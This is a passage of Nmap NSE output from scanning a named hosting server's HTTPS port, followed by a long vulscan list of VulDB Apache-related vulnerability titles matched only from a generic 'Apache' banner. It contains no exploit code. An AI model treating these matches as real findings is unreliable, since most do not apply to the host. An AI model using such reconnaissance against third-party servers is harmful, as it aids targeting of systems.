Initiating Parallel DNS resolution of 12 hosts. at 19:40
Completed Parallel DNS resolution of 12 hosts. at 19:40, 0.45s elapsed
NSE: Script scanning 93.191.156.197.
Initiating NSE at 19:40
Completed NSE at 19:41, 91.04s elapsed
Initiating NSE at 19:41
Completed NSE at 19:41, 3.70s elapsed
Nmap scan report for linux307.unoeuro.com (93.191.156.197)
Host is up (0.35s latency).

PORT STATE SERVICE VERSION
443/tcp open ssl/http Apache httpd
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
| http-brute:
|_ Path "/" does not require authentication
|_http-chrono: Request times for /; avg: 1808.50ms; min: 1565.00ms; max: 1945.05ms
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-date: Fri, 17 Jan 2020 00:40:22 GMT; -6s from local time.
| http-default-accounts:
| [Arris 2307] at /logo_t.gif
|_ <blank>:<blank>
|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-errors:
| Spidering limited to: maxpagecount=40; withinhost=linux307.unoeuro.com
| Found the following error pages:
|
| Error Code: 403
|_ http://linux307.unoeuro.com:443/
|_http-feed: Couldn't find any feeds.
|_http-fetch: Please enter the complete path of the directory to save data in.
| http-headers:
| Date: Fri, 17 Jan 2020 00:40:50 GMT
| Server: Apache
| Content-Length: 483
| Connection: close
| Content-Type: text/html; charset=iso-8859-1
|
|_ (Request type: GET)
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
|_http-mobileversion-checker: No mobile version detected.
| http-security-headers:
| Strict_Transport_Security:
|_ HSTS not configured in HTTPS Server
|_http-server-header: Apache
| http-sitemap-generator:
| Directory structure:
| Longest directory structure:
| Depth: 0
| Dir: /
| Total files found (by extension):
|_
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-title: 403 Forbidden
|_http-userdir-enum: Potential Users: root, admin, administrator, webadmin, sysadmin, netadmin, guest, user, web, test
| http-vhosts:
|_127 names had status 403
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
|_http-xssed: No previously reported XSS vuln.
| vulscan: VulDB - https://vuldb.com:
1868| [124876] Apache Ranger up to 1.1.x UnixAuthenticationService Stack-based memory corruption
1869| [124791] Apache Tomcat up to 7.0.90/8.5.33/9.0.11 URL Open Redirect
1870| [124787] Apache Pony Mail 0.7/0.8/0.9 Statistics Generator Timestamp Data information disclosure
1871| [124447] Apache HTTP Server up to 2.4.34 SETTINGS Frame denial of service
1872| [124346] Apache Mesos pre-1.4.2/1.5.0/1.5.1/1.6.0 on Executor HTTP API String Comparison validation JSON Web Token information disclosure
1873| [124286] Apache Tika up to 1.18 IptcAnpaParser Loop denial of service
1874| [124242] Apache Tika up to 0.18 C:/evil.bat" Directory unknown vulnerability
1875| [124241] Apache Tika up to 0.18 XML Parser Entity Expansion denial of service
1876| [124191] Apache Karaf up to 3.0.8/4.0.8/4.1.0 WebConsole .../gogo/ weak authentication
1877| [124190] Apache Karaf up to 4.1.x sshd privilege escalation
1878| [124152] Apache Camel Mail up to 2.22.0 Path directory traversal
1879| [124143] Apache SpamAssassin up to 3.4.1 PDFInfo Plugin Code Execution
1880| [124134] Apache SpamAssassin up to 3.4.1 Scan Engine HTML::Parser Email denial of service
1881| [124095] PHP up to 5.6.37/7.0.31/7.1.21/7.2.9 Apache2 sapi_apache2.c php_handler cross site scripting
1882| [124024] Apache Mesos 1.4.x/1.5.0 libprocess JSON Payload denial of service
1883| [123814] Apache ActiveMQ Client up to 5.15.5 TLS Hostname Verification Man-in-the-Middle weak authentication
1884| [123393] Apache Traffic Server up to 6.2.2/7.1.3 ESI Plugin Config privilege escalation
1885| [123392] Apache Traffic Server 6.2.2 TLS Handshake Segmentation Fault denial of service
1886| [123391] Apache Traffic Server up to 6.2.2/7.1.3 Range Request Performance denial of service
1887| [123390] Apache Traffic Server up to 6.2.2/7.1.3 Request HTTP Smuggling privilege escalation
1888| [123369] Apache Traffic Server up to 6.2.2/7.1.3 ACL remap.config Request denial of service
1889| [123197] Apache Sentry up to 2.0.0 privilege escalation
1890| [123145] Apache Struts up to 2.3.34/2.5.16 Namespace Code Execution
1891| [123144] Apache Cayenne up to 4.1.M1 CayenneModeler XML File File Transfer privilege escalation
1892| [122981] Apache Commons Compress 1.7 ZipArchiveInputStream ZIP Archive denial of service
1893| [122889] Apache HTTP Server up to 2.2.31/2.4.23 mod_userdir HTTP Response Splitting privilege escalation
1894| [122800] Apache Spark 1.3.0 REST API weak authentication
1895| [122642] Apache Airflow up to 1.8.x 404 Page Reflected cross site scripting
1896| [122568] Apache Tomcat up to 8.5.31/9.0.9 Connection Reuse weak authentication
1897| [122567] Apache Axis 1.0./1.1/1.2/1.3/1.4 cross site scripting
1898| [122556] Apache Tomcat up to 7.0.86/8.0.51/8.5.30/9.0.7 UTF-8 Decoder Loop denial of service
1899| [122531] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.9 WebSocket Client unknown vulnerability
1900| [122456] Apache Camel up to 2.20.3/2.21.0 XSD Validator XML External Entity
1901| [122455] Apache Tomcat Native up to 1.1.34/1.2.16 OSCP Revoked Certificate weak authentication
1902| [122454] Apache Tomcat Native up to 1.1.34/1.2.16 OSCP Responder Revoked Certificate weak authentication
1903| [122214] Apache Kafka up to 0.9.0.1/0.10.2.1/0.11.0.2/1.0.0 Broker Request Data Loss denial of service
1904| [122202] Apache Kafka up to 0.10.2.1/0.11.0.1 SASL Impersonation spoofing
1905| [122101] Docker Skeleton Runtime for Apache OpenWhisk Docker Action dockerskeleton:1.3.0 privilege escalation
1906| [122100] PHP Runtime for Apache OpenWhisk Docker Action action-php-v7.2:1.0.0 privilege escalation
1907| [122012] Apache Ignite up to 2.5 Serialization privilege escalation
1908| [121911] Apache Ambari up to 2.5.x/2.6.2 Log Message Credentials information disclosure
1909| [121910] Apache HTTP Server 2.4.33 mod_md HTTP Requests denial of service
1910| [121854] Oracle Tape Library ACSLS up to ACSLS 8.4.0-2 Apache Commons Collections unknown vulnerability
1911| [121752] Oracle Insurance Policy Administration 10.0/10.1/10.2/11.0 Apache Log4j unknown vulnerability
1912| [121370] Apache Spark up to 2.1.2/2.2.1/2.3.0 URL cross site scripting
1913| [121354] Apache CouchDB HTTP API Code Execution
1914| [121144] Apache LDAP API up to 1.0.1 SSL Filter information disclosure
1915| [121143] Apache Storm up to 0.10.2/1.0.6/1.1.2/1.2.1 Cluster privilege escalation
1916| [120436] Apache CXF Fediz up to 1.4.3 Application Plugin unknown vulnerability
1917| [120310] Apache PDFbox up to 1.8.14/2.0.10 AFMParser Loop denial of service
1918| [120168] Apache CXF weak authentication
1919| [120080] Apache Cassandra up to 3.11.1 JMX/RMI Interface RMI Request privilege escalation
1920| [120043] Apache HBase up to 1.2.6.0/1.3.2.0/1.4.4/2.0.0 Thrift 1 API Server weak authentication
1921| [119723] Apache Qpid Broker-J 7.0.0/7.0.1/7.0.2/7.0.3/7.0.4 AMQP Messages Crash denial of service
1922| [122569] Apache HTTP Server up to 2.4.33 HTTP2 Request denial of service
1923| [119486] Apache Geode up to 1.4.0 Security Manager Code Execution
1924| [119306] Apache MXNet Network Interface privilege escalation
1925| [118999] Apache Storm up to 1.0.6/1.1.2/1.2.1 Archive directory traversal
1926| [118996] Apache Storm up to 1.0.6/1.1.2/1.2.1 Daemon spoofing
1927| [118644] Apple macOS up to 10.13.5 apache_mod_php unknown vulnerability
1928| [118200] Apache Batik up to 1.9 Deserialization unknown vulnerability
1929| [118143] Apache NiFi activemq-client Library Deserialization denial of service
1930| [118142] Apache NiFi 1.6.0 SplitXML xxe privilege escalation
1931| [118051] Apache Zookeeper up to 3.4.9/3.5.3-beta weak authentication
1932| [117997] Apache ORC up to 1.4.3 ORC File Recursion denial of service
1933| [117825] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.8 CORS Filter privilege escalation
1934| [117405] Apache Derby up to 10.14.1.0 Network Server Network Packet privilege escalation
1935| [117347] Apache Ambari up to 2.6.1 HTTP Request directory traversal
1936| [117265] LibreOffice/Apache Office Writer SMB Connection XML Document information disclosure
1937| [117143] Apache uimaj/uima-as/uimaFIT/uimaDUCC XML XXE information disclosure
1938| [117117] Apache Tika up to 1.17 ChmParser Loop denial of service
1939| [117116] Apache Tika up to 1.17 BPGParser Loop denial of service
1940| [117115] Apache Tika up to 1.17 tika-server command injection
1941| [116929] Apache Fineract getReportType Parameter privilege escalation
1942| [116928] Apache Fineract REST Endpoint Parameter privilege escalation
1943| [116927] Apache Fineract MakercheckersApiResource Parameter sql injection
1944| [116926] Apache Fineract REST Parameter privilege escalation
1945| [116574] Apache wicket-jquery-ui up to 6.29.0/7.10.1/8.0.0-M9.1 WYSIWYG Editor privilege escalation
1946| [116622] Oracle Enterprise Manager for MySQL Database 12.1.0.4 EM Plugin: General (Apache Tomcat) unknown vulnerability
1947| [115931] Apache Solr up to 6.6.2/7.2.1 XML Data Parameter XML External Entity
1948| [115883] Apache Hive up to 2.3.2 privilege escalation
1949| [115882] Apache Hive up to 2.3.2 xpath_short information disclosure
1950| [115881] Apache DriverHive JDBC Driver up to 2.3.2 Escape Argument Bypass privilege escalation
1951| [115518] Apache Ignite 2.3 Deserialization privilege escalation
1952| [115260] EMC RSA Authentication Agent for Web up to 8.0.1 on IIS/Apache cross site scripting
1953| [115259] EMC RSA Authentication Agent for Web up to 8.0.1 on IIS/Apache Cookie Stack-based memory corruption
1954| [115500] CA Workload Control Center up to r11.4 SP5 Apache MyFaces Component Code Execution
1955| [115121] Apache Struts REST Plugin up to 2.5.15 Xstream XML Data denial of service
1956| [115061] Apache HTTP Server up to 2.4.29 HTTP Digest Authentication Challenge HTTP Requests Replay privilege escalation
1957| [115060] Apache HTTP Server up to 2.4.29 mod_cache_socache Request Header Crash denial of service
1958| [115059] Apache HTTP Server up to 2.4.29 HTTP2 NULL Pointer Dereference denial of service
1959| [115058] Apache HTTP Server up to 2.4.29 HTTP Header Crash denial of service
1960| [115057] Apache HTTP Server up to 2.4.29 mod_session Variable Name Cache privilege escalation
1961| [115039] Apache HTTP Server up to 2.4.29 FilesMatch File Upload privilege escalation
1962| [115038] Apache HTTP Server up to 2.0.65/2.2.34/2.4.29 mod_authnz_ldap Crash denial of service
1963| [114817] Apache Syncope up to 1.2.10/2.0.7 Search Parameter information disclosure
1964| [114816] Apache Syncope up to 1.2.10/2.0.7 XSLT Code Execution
1965| [114717] Apache Commons 1.11/1.12/1.13/1.14/1.15 ZIP Archive ZipFile/ZipArchiveInputStream denial of service
1966| [114661] Apache Allura up to 1.8.0 HTTP Response Splitting privilege escalation
1967| [114400] Apache Tomcat JK ISAPI Connector up to 1.2.42 IIS/ISAPI privilege escalation
1968| [114258] Apache HTTP Server up to 2.4.22 mod_cluster Segmentation Fault denial of service
1969| [114086] Apache ODE 1.3.3 ODE Process Deployment Web Service directory traversal
1970| [113955] Apache Xerces-C up to 3.2.0 XML Parser NULL Pointer Dereference denial of service
1971| [113945] Apache Tomcat up to 7.0.84/8.0.49/8.5.27/9.0.4 URL Pattern Empty String privilege escalation
1972| [113944] Apache OpenMeetings up to 3.x/4.0.1 CRUD Operation denial of service
1973| [113905] Apache Traffic Server up to 5.2.x/5.3.2/6.2.0/7.0.0 TLS Handshake Core Dump denial of service
1974| [113904] Apache Traffic Server up to 6.2.0 Host Header privilege escalation
1975| [113895] Apache Geode up to 1.3.x Code Execution
1976| [113894] Apache Geode up to 1.3.x TcpServer Code Execution
1977| [113888] Apache James Hupa WebMail 0.0.2 cross site scripting
1978| [113813] Apache Geode Cluster up to 1.3.x Secure Mode privilege escalation
1979| [113747] Apache Tomcat Servlets privilege escalation
1980| [113647] Apache Qpid up to 0.30 qpidd Broker AMQP Message Crash denial of service
1981| [113645] Apache VCL up to 2.1/2.2.1/2.3.1 Web GUI/XMLRPC API privilege escalation
1982| [113560] Apache jUDDI Console 3.0.0 Log Entries spoofing
1983| [113571] Apache Oozie up to 4.3.0/5.0.0-beta1 XML Data XML File privilege escalation
1984| [113569] Apache Karaf up to 4.0.7 LDAPLoginModule LDAP injection denial of service
1985| [113273] Apache JMeter 2.x/3.x Distributed Test Only privilege escalation
1986| [113198] Apache Qpid Dispatch Router 0.7.0/0.8.0 AMQP denial of service
1987| [113186] Apache JMeter 2.x/3.x Distributed Test Only privilege escalation
1988| [113145] Apache Thrift up to 0.9.3 Go Client Library privilege escalation
1989| [113106] Apache jUDDI up to 3.3.3 XML Data WADL2Java/WSDL2Java XML Document privilege escalation
1990| [113105] Apache Qpid Broker-J 7.0.0 AMQP Crash denial of service
1991| [112885] Apache Allura up to 1.8.0 File information disclosure
1992| [112856] Apache CloudStack up to 4.8.1.0/4.9.0.0 API weak authentication
1993| [112855] Apache CloudStack 4.1.0/4.1.1 API information disclosure
1994| [112678] Apache Tomcat up to 7.0.82/8.0.47/8.5.23/9.0.1 Bug Fix 61201 privilege escalation
1995| [112677] Apache Tomcat Native Connector up to 1.1.34/1.2.14 OCSP Checker Client weak authentication
1996| [112625] Apache POI up to 3.16 Loop denial of service
1997| [112448] Apache NiFi up to 1.3.x Deserialization privilege escalation
1998| [112396] Apache Hadoop 2.7.3/2.7.4 YARN NodeManager Credentials information disclosure
1999| [112339] Apache NiFi 1.5.0 Header privilege escalation
2000| [112330] Apache NiFi 1.5.0 Header HTTP Request privilege escalation
2001| [112314] NetGain Enterprise Manager 7.2.730 Build 1034 org.apache.jsp.u.jsp.tools.exec_jsp Servlet Parameter privilege escalation
2002| [112253] Apache Hadoop up to 0.23.x/2.7.4/2.8.2 MapReduce Job History Server Configuration File privilege escalation
2003| [112171] Oracle Secure Global Desktop 5.3 Apache Log4j privilege escalation
2004| [112164] Oracle Agile PLM 9.3.5/9.3.6 Apache Tomcat unknown vulnerability
2005| [112161] Oracle Agile PLM 9.3.3/9.3.4/9.3.5/9.3.6 Apache Tomcat privilege escalation
2006| [112158] Oracle Autovue for Agile Product Lifecycle Management 21.0.0/21.0.1 Apache Log4j privilege escalation
2007| [112156] Oracle Agile PLM 9.3.3/9.3.4/9.3.5/9.3.6 Apache Log4j privilege escalation
2008| [112155] Oracle Agile Engineering Data Management 6.1.3/6.2.0/6.2.1 Apache Log4j privilege escalation
2009| [112137] Oracle MICROS Relate CRM Software 10.8.x/11.4.x/15.0.x, Apache Tomcat unknown vulnerability
2010| [112136] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Tomcat privilege escalation
2011| [112133] Oracle Retail Workforce Management 1.60.7/1.64.0 Apache Log4j privilege escalation
2012| [112129] Oracle Retail Assortment Planning 14.1.3/15.0.3/16.0.1 Apache Log4j privilege escalation
2013| [112114] Oracle 9.1 Apache Log4j privilege escalation
2014| [112113] Oracle 9.1 Apache Log4j privilege escalation
2015| [112045] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat privilege escalation
2016| [112038] Oracle Health Sciences Empirica Inspections 1.0.1.1 Apache Tomcat information disclosure
2017| [112019] Oracle Endeca Information Discovery Integrator 3.1.0/3.2.0 Apache Tomcat privilege escalation
2018| [112017] Oracle WebCenter Portal 11.1.1.9.0/12.2.1.2.0/12.2.1.3.0 Apache Struts 1 cross site scripting
2019| [112011] Oracle Identity Manager 11.1.2.3.0 Apache Commons Collections privilege escalation
2020| [111950] Oracle Database 12.2.0.1 Apache Tomcat information disclosure
2021| [111703] Apache Sling XSS Protection API 1.0.4 URL Encoding cross site scripting
2022| [111556] Apache Geode up to 1.2.x Secure Mode Parameter OQL privilege escalation
2023| [111555] Apache Geode up to 1.2.x Secure Mode OQL privilege escalation
2024| [111540] Apache Geode up to 1.2.x Secure Mode information disclosure
2025| [111519] Apache Sling JCR ContentLoader 2.1.4 xmlreader directory traversal
2026| [111338] Apache DeltaSpike-JSF 1.8.0 cross site scripting
2027| [111330] Apache OFBiz 16.11.01/16.11.02/16.11.03 BIRT Plugin cross site scripting
2028| [110789] Apache Sling up to 1.4.0 Authentication Service Credentials information disclosure
2029| [110785] Apache Drill up to 1.11.0 Query Page unknown vulnerability
2030| [110701] Apache Fineract Query Parameter sql injection
2031| [110484] Apache Synapse up to 3.0.0 Apache Commons Collections Serialized Object Code Injection privilege escalation
2032| [110426] Adobe Experience Manager 6.0/6.1/6.2/6.3 Apache Sling Servlets Post cross site scripting
2033| [110141] Apache Struts up to 2.5.14 REST Plugin denial of service
2034| [110140] Apache Qpid Broker-J up to 0.32 privilege escalation
2035| [110139] Apache Qpid Broker-J up to 6.1.4 AMQP Frame denial of service
2036| [110106] Apache CXF Fediz Spring cross site request forgery
2037| [109766] Apache OpenOffice up to 4.1.3 DOC File Parser WW8Fonts memory corruption
2038| [109750] Apache OpenOffice up to 4.1.3 DOC File Parser ImportOldFormatStyles memory corruption
2039| [109749] Apache OpenOffice up to 4.1.3 PPT File Parser PPTStyleSheet memory corruption
2040| [109606] October CMS Build 412 Apache Configuration File Upload privilege escalation
2041| [109419] Apache Camel up to 2.19.3/2.20.0 camel-castor Java Object Deserialization privilege escalation
2042| [109418] Apache Camel up to 2.19.3/2.20.0 camel-hessian Java Object Deserialization privilege escalation
2043| [109400] Apache CouchDB up to 1.6.x/2.1.0 Database Server Shell privilege escalation
2044| [109399] Apache CouchDB up to 1.6.x/2.1.0 JSON Parser Shell privilege escalation
2045| [109398] Apache CXF 3.1.14/3.2.1 JAX-WS/JAX-RS Attachment denial of service
2046| [108872] Apache Hive up to 2.1.1/2.2.0/2.3.0 Policy Enforcement privilege escalation
2047| [108939] Apple macOS up to 10.13.1 apache unknown vulnerability
2048| [108938] Apple macOS up to 10.13.1 apache denial of service
2049| [108937] Apple macOS up to 10.13.1 apache unknown vulnerability
2050| [108936] Apple macOS up to 10.13.1 apache unknown vulnerability
2051| [108935] Apple macOS up to 10.13.1 apache denial of service
2052| [108934] Apple macOS up to 10.13.1 apache unknown vulnerability
2053| [108933] Apple macOS up to 10.13.1 apache unknown vulnerability
2054| [108932] Apple macOS up to 10.13.1 apache unknown vulnerability
2055| [108931] Apple macOS up to 10.13.1 apache denial of service
2056| [108930] Apple macOS up to 10.13.1 apache unknown vulnerability
2057| [108929] Apple macOS up to 10.13.1 apache denial of service
2058| [108928] Apple macOS up to 10.13.1 apache unknown vulnerability
2059| [108797] Apache Struts up to 2.3.19 TextParseUtiltranslateVariables OGNL Expression privilege escalation
2060| [108795] Apache Traffic Server up to 5.3.0 HTTP2 set_dynamic_table_size memory corruption
2061| [108794] Apache WSS4J up to 1.6.16/2.0.1 Incomplete Fix Leak information disclosure
2062| [108793] Apache Qpid up to 0.30 qpidd Crash denial of service
2063| [108792] Apache Traffic Server up to 5.1.0 Access Restriction privilege escalation
2064| [108791] Apache Wicket up to 1.5.11/6.16.x/7.0.0-M2 Session information disclosure
2065| [108790] Apache Storm 0.9.0.1 Log Viewer directory traversal
2066| [108789] Apache Cordova In-App-Browser Standalone Plugin up to 0.3.1 on iOS CDVInAppBrowser privilege escalation
2067| [108788] Apache Cordova File-Transfer Standalone Plugin up to 0.4.1 on iOS ios/CDVFileTransfer.m spoofing
2068| [108787] Apache HttpClient up to 4.3.0 HttpClientBuilder.java unknown vulnerability
2069| [108786] Apache Wicket up to 1.4.21/1.5.9/6.3.x script Tag cross site scripting
2070| [108783] Apache Hadoop up to 0.23.3/1.0.3/2.0.1 Kerberos Security Feature Key weak encryption
2071| [108782] Apache Xerces2 XML Service denial of service
2072| [108781] Apache jUDDI up to 1.x happyjuddi.jsp Parameter cross site scripting
2073| [108780] Apache jUDDI up to 1.x Log File uddiget.jsp spoofing
2074| [108709] Apache Cordova Android up to 3.7.1/4.0.1 intent URL privilege escalation
2075| [108708] Apache ActiveMQ up to 5.10.0 XML Data XML External Entity
2076| [108707] Apache ActiveMQ up to 1.7.0 XML Data XML External Entity
2077| [108629] Apache OFBiz up to 10.04.01 privilege escalation
2078| [108543] Apache Derby 10.1.2.1/10.2.2.0/10.3.1.4/10.4.1.3 Export File privilege escalation
2079| [108312] Apache HTTP Server on RHEL IP Address Filter privilege escalation
2080| [108297] Apache NiFi up to 0.7.1/1.1.1 Proxy Chain Username Deserialization privilege escalation
2081| [108296] Apache NiFi up to 0.7.1/1.1.1 Cluster Request privilege escalation
2082| [108250] Oracle Secure Global Desktop 5.3 Apache HTTP Server memory corruption
2083| [108245] Oracle Transportation Management up to 6.3.7 Apache Tomcat unknown vulnerability
2084| [108244] Oracle Transportation Management 6.4.1/6.4.2 Apache Commons FileUpload denial of service
2085| [108243] Oracle Agile Engineering Data Management 6.1.3/6.2.0 Apache Commons Collections memory corruption
2086| [108222] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Batik denial of service
2087| [108219] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Tomcat unknown vulnerability
2088| [108217] Oracle Retail Store Inventory Management 13.2.9/14.0.4/14.1.3/15.0.1/16.0.1 Apache Groovy unknown vulnerability
2089| [108216] Oracle Retail Convenience and Fuel POS Software 2.1.132 Apache Groovy unknown vulnerability
2090| [108169] Oracle MySQL Enterprise Monitor up to 3.2.8.2223/3.3.4.3247/3.4.2.4181 Apache Tomcat unknown vulnerability
2091| [108113] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Batik denial of service
2092| [108107] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat unknown vulnerability
2093| [108102] Oracle Healthcare Master Person Index 4.x Apache Groovy unknown vulnerability
2094| [108085] Oracle Identity Manager 11.1.2.3.0 Apache Struts 1 memory corruption
2095| [108083] Oracle API Gateway 11.1.2.4.0 Apache Batik denial of service
2096| [108080] Oracle GlassFish Server 3.1.2 Apache Commons FileUpload denial of service
2097| [108066] Oracle Management Pack for GoldenGate 11.2.1.0.12 Apache Tomcat memory corruption
2098| [108062] Oracle BI Publisher 11.1.1.7.0/12.2.1.1.0/12.2.1.2.0 Apache ActiveMQ memory corruption
2099| [108060] Oracle Enterprise Manager Ops Center 12.2.2/12.3.2 Apache Groovy unknown vulnerability
2100| [108033] Oracle Primavera Unifier 9.13/9.14/10.x/15.x/16.x, Apache Groovy unknown vulnerability
2101| [108013] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 Apache Groovy unknown vulnerability
2102| [108011] Oracle Communications Services Gatekeeper 5.1/6.0 Apache Trinidad unknown vulnerability
2103| [107904] Apache Struts up to 2.3.28 Double OGNL Evaluation privilege escalation
2104| [107860] Apache Solr up to 7.0 Apache Lucene RunExecutableListener XML External Entity
2105| [107834] Apache Ranger up to 0.6.1 Change Password privilege escalation
2106| [107639] Apache NiFi 1.4.0 XML External Entity
2107| [107606] Apache ZooKeper up to 3.4.9/3.5.2 Command CPU Exhaustion denial of service
2108| [107597] Apache Roller up to 5.0.2 XML-RPC Protocol Support XML External Entity
2109| [107429] Apache Impala up to 2.9.x Kudu Table privilege escalation
2110| [107411] Apache Tomcat up to 7.0.81/8.0.46/8.5.22/9.0.0 JSP File File Upload privilege escalation
2111| [107385] Apache Geode up to 1.2.0 Secure Mode privilege escalation
2112| [107339] Apache OpenNLP up to 1.5.3/1.6.0/1.7.2/1.8.1 XML Data XML External Entity
2113| [107333] Apache Wicket up to 8.0.0-M1 CSRF Prevention HTTP Header privilege escalation
2114| [107323] Apache Wicket 1.5.10/6.13.0 Class Request information disclosure
2115| [107310] Apache Geode up to 1.2.0 Command Line Utility Query privilege escalation
2116| [107276] ArcSight ESM/ArcSight ESM Express up to 6.9.1c Patch 3/6.11.0 Apache Tomcat Version information disclosure
2117| [107266] Apache Tika up to 1.12 XML Parser XML External Entity
2118| [107262] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
2119| [107258] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
2120| [107197] Apache Xerces Jelly Parser XML File XML External Entity
2121| [107193] ZTE NR8950 Apache Commons Collections RMI Request Deserialization privilege escalation
2122| [107084] Apache Struts up to 2.3.19 cross site scripting
2123| [106877] Apache Struts up to 2.0.33/2.5.10 Freemarker Tag privilege escalation
2124| [106875] Apache Struts up to 2.5.5 URL Validator denial of service
2125| [106874] Apache Struts up to 2.3.30 Convention Plugin directory traversal
2126| [106847] Apache Tomcat up to 7.0.80 VirtualDirContext Source information disclosure
2127| [106846] Apache Tomcat up to 7.0.79 on Windows HTTP PUT Method Parameter File Upload privilege escalation
2128| [106777] Apache HTTP Server up to 2.2.34/2.4.27 Limit Directive ap_limit_section HTTP Request information disclosure
2129| [106739] puppetlabs-apache up to 1.11.0/2.0.x weak authentication
2130| [106720] Apache Wicket up to 1.5.12/6.18.x/7.0.0-M4 CryptoMapper privilege escalation
2131| [106586] Apache Brooklyn up to 0.9.x REST Server cross site scripting
2132| [106562] Apache Spark up to 2.1.1 Launcher API Deserialization privilege escalation
2133| [106559] Apache Brooklyn up to 0.9.x SnakeYAML YAML Data Java privilege escalation
2134| [106558] Apache Brooklyn up to 0.9.x REST Server cross site request forgery
2135| [106556] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
2136| [106555] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
2137| [106171] Apache Directory LDAP API up to 1.0.0-M30 Timing unknown vulnerability
2138| [106167] Apache Struts up to 2.5.12 REST Plugin XML Data privilege escalation
2139| [106166] Apache Struts up to 2.3.33/2.5.12 REST Plugin denial of service
2140| [106165] Apache Struts up to 2.3.33/2.5.12 URLValidator Regex CPU Exhaustion denial of service
2141| [106115] Apache Hadoop up to 2.6.4/2.7.2 YARN NodeManager Password information disclosure
2142| [106012] Apache Solr up to 5.5.3/6.4.0 Replication directory traversal
2143| [105980] Apache Engine 16.11.01 Parameter Reflected unknown vulnerability
2144| [105962] Apache Atlas 0.6.0/0.7.0 Frame cross site scripting
2145| [105961] Apache Atlas 0.6.0/0.7.0 Stack Trace information disclosure
2146| [105960] Apache Atlas 0.6.0/0.7.0 Search Reflected cross site scripting
2147| [105959] Apache Atlas 0.6.0/0.7.0 edit Tag DOM cross site scripting
2148| [105958] Apache Atlas 0.6.0/0.7.0 edit Tag Stored cross site scripting
2149| [105957] Apache Atlas 0.6.0/0.7.0 Cookie privilege escalation
2150| [105905] Apache Atlas 0.6.0/0.7.0/0.7.1 /js privilege escalation
2151| [105878] Apache Struts up to 2.3.24.0 privilege escalation
2152| [105682] Apache2Triad 1.5.4 phpsftpd/users.php Parameter cross site scripting
2153| [105681] Apache2Triad 1.5.4 phpsftpd/users.php Request cross site request forgery
2154| [105680] Apache2Triad 1.5.4 Parameter Session Fixation weak authentication
2155| [105643] Apache Pony Mail up to 0.8b weak authentication
2156| [105288] Apache Sling up to 2.3.21 Sling.evalString() String cross site scripting
2157| [105219] Apache Tomcat up to 8.5.15/9.0.0.M21 HTTP2 Bypass directory traversal
2158| [105218] Apache Tomcat up to 7.0.78/8.0.44/8.5.15/9.0.0.M21 CORS Filter Cache Poisoning privilege escalation
2159| [105215] Apache CXF up to 3.0.12/3.1.9 OAuth2 Hawk/JOSE MAC Validation Timing unknown vulnerability
2160| [105206] Apache CXF up to 3.0.11/3.1.8 JAX-RS Module XML External Entity
2161| [105205] Apache CXF up to 3.0.11/3.1.8 HTTP Transport Module Parameter cross site scripting
2162| [105202] Apache Storm 1.0.0/1.0.1/1.0.2/1.0.3/1.1.0 Worker privilege escalation
2163| [104987] Apache Xerces-C++ XML Service CPU Exhaustion denial of service
2164| [104986] Apache CXF 2.4.5/2.5.1 WS-SP UsernameToken Policy SOAP Request weak authentication
2165| [104985] Apache MyFaces Core up to 2.1.4 EL Expression Parameter Injection information disclosure
2166| [104983] Apache Wink up to 1.1.1 XML Document xxe privilege escalation
2167| [104981] Apache Commons Email 1.0/1.1/1.2/1.3/1.4 Subject Linebreak SMTP privilege escalation
2168| [104591] MEDHOST Document Management System Apache Solr Default Credentials weak authentication
2169| [104062] Oracle MySQL Enterprise Monitor up to 3.3.3.1199 Apache Tomcat unknown vulnerability
2170| [104061] Oracle MySQL Enterprise Monitor up to 3.2.7.1204/3.3.3.1199 Apache Tomcat unknown vulnerability
2171| [104060] Oracle MySQL Enterprise Monitor up to 3.1.5.7958/3.2.5.1141/3.3.2.1162 Apache Struts 2 unknown vulnerability
2172| [103995] Oracle 8.3/8.4/15.1/15.2 Apache Trinidad unknown vulnerability
2173| [103993] Oracle Policy Automation up to 12.2.3 Apache Commons FileUplaod denial of service
2174| [103916] Oracle Banking Platform 2.3/2.4/2.4.1/2.5 Apache Commons FileUpload denial of service
2175| [103906] Oracle Communications BRM 11.2.0.0.0 Apache Commons Collections privilege escalation
2176| [103904] Oracle Communications BRM 11.2.0.0.0/11.3.0.0.0 Apache Groovy memory corruption
2177| [103866] Oracle Transportation Management 6.1/6.2 Apache Webserver unknown vulnerability
2178| [103816] Oracle BI Publisher 11.1.1.9.0/12.2.1.1.0/12.2.1.2.0 Apache Commons Fileupload denial of service
2179| [103797] Oracle Tuxedo System and Applications Monitor Apache Commons Collections privilege escalation
2180| [103792] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Commons Fileupload privilege escalation
2181| [103791] Oracle Endeca Server 7.6.0.0/7.6.1.0 Apache Commons Collections privilege escalation
2182| [103788] Oracle Enterprise Repository 11.1.1.7.0/12.1.3.0.0 Apache ActiveMQ memory corruption
2183| [103787] Oracle Enterprise Data Quality 8.1.13.0.0 Apache Groovy memory corruption
2184| [103763] Apache Sling up to 1.0.11 XSS Protection API XSS.getValidXML() Application XML External Entity
2185| [103762] Apache Sling up to 1.0.12 XSS Protection API XSSAPI.encodeForJSString() Script Tag cross site scripting
| [103693] Apache OpenMeetings 1.0.0 HTTP Method privilege escalation
